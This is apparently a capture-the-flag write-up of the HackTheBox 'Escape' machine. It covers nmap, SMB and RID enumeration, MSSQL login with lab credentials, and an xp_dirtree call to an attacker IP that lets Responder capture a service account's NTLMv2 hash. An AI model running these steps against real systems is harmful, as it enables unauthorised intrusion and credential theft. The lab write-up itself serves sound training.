Post

HackTheBox Escape Writeup

Nmap Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
Nmap scan report for 10.10.11.202
Host is up, received echo-reply ttl 127 (0.087s latency).
Scanned at 2025-06-09 07:56:39 CDT for 112s
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-09 12:35:38Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after:  2023-11-18T21:05:34
| MD5:   96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAv
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:07+00:00; -21m22s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after:  2023-11-18T21:05:34
| MD5:   96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA7
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T12:34:38
| Not valid after:  2055-06-09T12:34:38
| MD5:   671f:5a47:d9ec:ad69:13bf:474f:9bd4:9730
| SHA-1: 85c3:1a8d:4520:1702:89af:738d:69ad:a1a4:88d8:da6c
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQRLlXC2E6CaVE2s/thpjvyzANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwNjA5MTIzNDM4WhgPMjA1NTA2MDkxMjM0MzhaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALnWntNq
| HY/AGNeDe62Dx9c4ufle1sjOdkoaUJghyVrxcjLMa18wHXS0SbMpxXG7IVTtqgUL
| xgvtgqjxA4li9e9j/RRULQ9fvrlfJefGxVanot2lrrYb1ytS5dG00oNLJ1D7tfbh
| vE6VbW3SE4XU1q8OWvgFRRo9+dzBagHKM7UPBdiRsiLXIUSCo+MbVgw2EXcqJGs3
| GD9uW9uuG9pWhBBDJQcuztrERRYd0xnheR+CG27DOy67harLjUkz1q3fOve2x9k/
| HRrkZHg+cswRsOcczZTMQpwtK5Fj+P2s6DZtCtTFXZtFfxuEslEBxOyKx5xWeZ5D
| RcZooTrWx1Cj4ZUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAhv9l7MCUw0qBZ0Vh
| JUwld6PvWrYwAB6Ikpilo2J9+LRDTAXo0HUzFHkSagY72cCTI24jTIvMwsWZARGN
| 8A5aWYO2e5QoPkUeE3BHFSrEnMJ9cQj8amwkwQVJTkSxCsHO+SDS2jimngqPYeNj
| BVQfzUa2iqRirpxrJ92QnW9w+yCcM1ZugWTPFGpzmQDZtn57xqKPB7M8gL74Exle
| AabW9gYyJkigulGL7VLneT234XgYGv62enhC/OfB+20AIdXJZMYXc5NENPmr/bTN
| EKDML6PTJkPLlFRo/+22jV/qTRTOaUURDjuAw7O3GuLJv25FQHNJoRrK27oylwep
| 4V9BlQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after:  2023-11-18T21:05:34
| MD5:   96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAv
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
|
|   Checking for Conficker.C or higher...
|   Check 1 (port 63970/tcp): CLEAN (Timeout)
|   Check 2 (port 35661/tcp): CLEAN (Timeout)
|   Check 3 (port 50586/udp): CLEAN (Timeout)
|   Check 4 (port 52925/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-09T12:36:24
|_  start_date: N/A
|_clock-skew: mean: -21m22s, deviation: 2s, median: -21m22s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  9 07:58:31 2025 -- 1 IP address (1 host up) scanned in 112.59 seconds

SMB Enumeration

Null User Login

1
2
3
4
5
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u '' -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\: 
SMB         10.10.11.202    445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED

Does Not Exist User Login

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'DoesNotExist' -p '' --shares 
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\DoesNotExist: 
SMB         10.10.11.202    445    DC               [+] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share 
SMB         10.10.11.202    445    DC               Public          READ            
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share

Public Shares Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ smbclient "//10.10.11.202/Public" -U 'sequel.htb\DoesNotExist'
Password for [SEQUEL.HTB\DoesNotExist]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 05:51:25 2022
  ..                                  D        0  Sat Nov 19 05:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 07:39:43 2022

                5184255 blocks of size 4096. 1455544 blocks available
smb: \> prompt off
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (110.7 KiloBytes/sec) (average 110.7 KiloBytes/sec)
smb: \> exit

PDF Enumeration

We found several usernames:

  • ryan
  • tom
  • Brandon

We got credentials for the MySQL server.

RID Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
                                                                                                                                         
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'DoesNotExist' -p '' --rid-brute
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\DoesNotExist: 
SMB         10.10.11.202    445    DC               [+] Brute forcing RIDs
SMB         10.10.11.202    445    DC               498: sequel\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               500: sequel\Administrator (SidTypeUser)
SMB         10.10.11.202    445    DC               501: sequel\Guest (SidTypeUser)
SMB         10.10.11.202    445    DC               502: sequel\krbtgt (SidTypeUser)
SMB         10.10.11.202    445    DC               512: sequel\Domain Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               513: sequel\Domain Users (SidTypeGroup)
SMB         10.10.11.202    445    DC               514: sequel\Domain Guests (SidTypeGroup)
SMB         10.10.11.202    445    DC               515: sequel\Domain Computers (SidTypeGroup)
SMB         10.10.11.202    445    DC               516: sequel\Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               517: sequel\Cert Publishers (SidTypeAlias)
SMB         10.10.11.202    445    DC               518: sequel\Schema Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               519: sequel\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               520: sequel\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.202    445    DC               521: sequel\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               522: sequel\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               525: sequel\Protected Users (SidTypeGroup)
SMB         10.10.11.202    445    DC               526: sequel\Key Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               527: sequel\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               553: sequel\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.202    445    DC               571: sequel\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.202    445    DC               572: sequel\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.202    445    DC               1000: sequel\DC$ (SidTypeUser)
SMB         10.10.11.202    445    DC               1101: sequel\DnsAdmins (SidTypeAlias)
SMB         10.10.11.202    445    DC               1102: sequel\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.202    445    DC               1103: sequel\Tom.Henn (SidTypeUser)
SMB         10.10.11.202    445    DC               1104: sequel\Brandon.Brown (SidTypeUser)
SMB         10.10.11.202    445    DC               1105: sequel\Ryan.Cooper (SidTypeUser)
SMB         10.10.11.202    445    DC               1106: sequel\sql_svc (SidTypeUser)
SMB         10.10.11.202    445    DC               1107: sequel\James.Roberts (SidTypeUser)
SMB         10.10.11.202    445    DC               1108: sequel\Nicole.Thompson (SidTypeUser)
SMB         10.10.11.202    445    DC               1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)

MSSQL Enumeration

1
2
3
4
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec mssql 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
MSSQL       10.10.11.202    1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:DC)
MSSQL       10.10.11.202    1433   DC               [+] PublicUser:GuestUserCantWrite1
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ impacket-mssqlclient 'PublicUser:GuestUserCantWrite1@10.10.11.202'                                  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>

WINRM Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
                                                                                                                                                            
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' 
SMB         10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [-] sequel.htb\PublicUser:GuestUserCantWrite1
                                                                                                                                                             
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
SMB         10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:DC)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [-] DC\PublicUser:GuestUserCantWrite1

Responder Attack

Since we are able to log in to the MSSQL database but can’t use xp_cmdshell, we could try a Responder attack to get the sql_svc password.

1
2
3
SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.16.8\share'
subdirectory   depth   
------------   -----
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.8]
    Responder IPv6             [dead:beef:4::1006]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-BTFEDX7IDC4]
    Responder Domain Name      [1R92.LOCAL]
    Responder DCE-RPC Port     [45323]

[+] Listening for events...                                                                                                                                  

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
